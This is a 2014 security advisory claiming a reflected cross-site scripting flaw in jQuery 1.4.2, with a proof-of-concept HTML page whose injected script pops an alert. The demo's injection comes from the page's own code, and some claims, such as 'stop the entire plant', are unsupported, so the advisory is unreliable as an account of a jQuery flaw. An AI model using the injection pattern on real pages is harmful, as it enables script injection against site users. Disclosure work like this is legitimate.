JQuery version 1.4.2 suffers from a create object option in runtime client-side cross site scripting vulnerability.
17ead7ca89da6c91771cbedd876a663573f5710a9c57d5cbdc92e3677c5d84fe
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300
VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2
LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.
Published: 09/01/2014
Version: 1.0
Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2
Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).
Credit: Mauro Risonho de Paula Assumpção aka firebits
Finding 1: Create object option in runtime client-side and insert XSS
Reflected
‘index.html’ page, by phishing or fake site remote.
CVE: CVE-2014-? (feedback cve mitre)
Proof of Concept:
Exploit:jquery-xss-reflected.com.br.html
<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho@gmail.com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil -->
<! -- _____.__ ___. .__ __
-->
<! -- _/ ____\__|______ ____\_ |__ |__|/ |_ ______ -->
<! -- \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ -->
<! -- | | | || | \/\ ___/| \_\ \ || | \___ \ -->
<! -- |__| |__||__| \___ |___ /__||__| /____ | -->
<! -- \/ \/ \/ -->
<! -- bits on fire - 1989-2014 - brazil -->
<! -- -->
<! -- * jQuery JavaScript Library v1.4.2 -->
<! -- * http://jquery.com/ -->
<! -- * -->
<! -- * Copyright 2010, John Resig -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses. -->
<! -- * http://jquery.org/license -->
<! -- * -->
<! -- * Includes Sizzle.js -->
<! -- * http://sizzlejs.com/ -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses. -->
<! -- * -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500 -->
<! -- */ -->
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="http://<target>/js/jquery.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert('xss
reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil
@firebitsbr - mauro.risonho@gmail.com');</script></option>
</select>
</p>
</form>
</body>
</html>
Vendor Response:
<It was not sent to the vendor, but this is sending to the MITRE CVE to
contact the vendor.> from VSLA Virtual Security Labs Anywhere.
VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.
Remediation Steps:
Update jquery 1.11.1
Vendor Communication Timeline:
09/01/2014 – Vulnerability disclosed
? – Confirmation to release vulnerabilities
? – Advisory published
References
1. Wikipedia http://en.wikipedia.org/wiki/JQuery
2. Jquery http://jquery.com/
3. VSLA Virtual Security Labs Anywhere https://firebitsbr.wordpress.com
About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
https://firebitsbr.wordpress.com
Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.